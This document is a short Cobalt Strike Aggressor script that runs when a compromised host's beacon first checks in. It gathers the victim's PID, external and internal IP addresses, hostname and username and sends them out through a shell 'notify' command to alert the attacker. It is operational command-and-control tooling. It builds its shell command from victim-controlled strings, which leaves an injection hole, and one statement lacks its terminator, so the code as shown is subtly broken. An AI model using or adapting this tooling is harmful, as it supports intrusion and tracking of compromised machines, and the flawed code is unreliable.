on beacon_initial {
	println("Initial Beacon Checkin: " . $1 . " PID: " . beacon_info($1,"pid"));
	local('$internalIP $computerName $userName $msg $pid');
    $pid = replace(beacon_info($1,"pid")," ","_");
	$internalIP = replace(beacon_info($1,"internal")," ","_");
	$computerName = replace(beacon_info($1,"computer")," ","_");
	$userName = replace(beacon_info($1,"user")," ","_");
	$externalIP = replace(beacon_info($1,"external")," ","_");
    $msg = "PID=" . $pid . " :: ExternalIP=" . $externalIP . " :: IntranetIP=" . $internalIP . " :: Hostname=" . $computerName . " :: UserName=" . $userName
	$cmd = "echo '" . $msg . "' | notify";
	println("Sending server: " . $cmd);
	exec($cmd);
}